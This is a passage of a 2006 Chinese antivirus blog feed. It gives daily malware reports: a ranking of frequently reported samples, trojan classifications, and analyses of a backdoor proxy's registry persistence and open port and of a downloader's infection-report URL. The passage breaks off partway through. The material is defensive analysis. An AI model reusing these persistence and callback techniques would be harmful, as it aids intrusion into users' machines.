<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0116516086BC12E2 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Agent</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L0116420087D254E5 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\wuass32.exe, 21953字节<BR>在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft (R) User Authorization Service&#8221; = %SystemDir%\wuass32.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>2、打开后门代理TCP端口3557，可供黑客远程使用，作为跳板，进行黑客行为。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<P> </P><!--AD_Link_Data_Begin-->
<p align="center"><span style="font-size: 0.8em">本篇文章使用<a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank">aigaogao</a> Blog软件发布, <a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank">“我的Blog要备份”</a></span></p>
<p><!--AD_Link_Data_End--></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>昨日病毒(2006.03.23)</title>
		<link>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx#comments</comments>
		<pubDate>Fri, 24 Mar 2006 05:05:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx</guid>
		<description><![CDATA[3月23日上报次数较多的样本有：
newname5.exe -------- 197； 
mousepad5.exe -------- 194； 
keyboard5.exe -------- 164； 
dpnss32.exe -------- 113； 
请进入全文查看它们的分析报告。]]></description>
			<content:encoded><![CDATA[<p><P><SPAN> <br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 562px" width=562></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 41px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width=562><br />
<DIV><STRONG><FONT face=Arial>昨日病毒</FONT></STRONG></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 31px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 146px" width=146><br />
<COL style="WIDTH: 149px" width=149></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=146><br />
<DIV><FONT face=Arial><STRONG>统计时段</STRONG></FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=149><br />
<DIV><FONT face=宋体><br />
<DIV title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><SPAN id=L0238050004700606 style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-23</SPAN><SPAN style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></SPAN></DIV></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 555px" width=555></COLGROUP><br />
<TBODY><br />
<TR><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><br />
<DIV><STRONG><FONT face=Arial>病毒样本上报数排行</FONT></STRONG></DIV><br />
<DIV><STRONG><FONT face=Arial></FONT></STRONG> </DIV><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 165px" width=165></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 22px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=229><br />
<DIV align=center><FONT face=Arial>样本文件名</FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=165><br />
<DIV align=center><FONT face=Arial>上报次数</FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY><br />
<TBODY><br />
<TR id=L023806C006A80CC9><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0238074008E0140C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname5.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L023807800B181B8F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">197</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023807C00D502352><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L023808400F882B95 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad5.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0238088011C03418 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">194</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023808C013F83CDB><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L023809401630461E title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard5.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0238098018684FA1 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">164</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023809C01AA05964><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380A401CD863A7 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">dpnss32.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380A801F106E2A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">113</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 118px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><br />
<DIV><FONT face=Arial><STRONG>技术分析</STRONG></FONT></DIV><SPAN><SPAN id=L02380B402148796D title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L02380BC023808530><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02380C0025B89133 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname5.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02380C4027F09D76 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</SPAN></SPAN></TD></TR><br />
<TR id=L02380C802A28A9F9><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02380CC02C60B6BC title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad5.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02380D002E98C3BF title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanClicker</SPAN></SPAN></TD></TR><br />
<TR id=L02380D4030D0D102><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02380D803308DE85 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard5.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02380DC03540EC48 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L02380E403778FA8B title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word">和以前描述过的keyboard2.exe, keyboard3.exe, keyboard4.exe功能类似，是个变种。<BR>keyboard5.exe是个木马下载器。<BR>运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：<BR><A href="http://www.nonameforthisdomain.com/teller2.asp?rnd">http://www.nonameforthisdomain.com/teller2.asp?rnd</A>=[随机数]<BR>然后获得一个要下载程序的列表：<BR><A 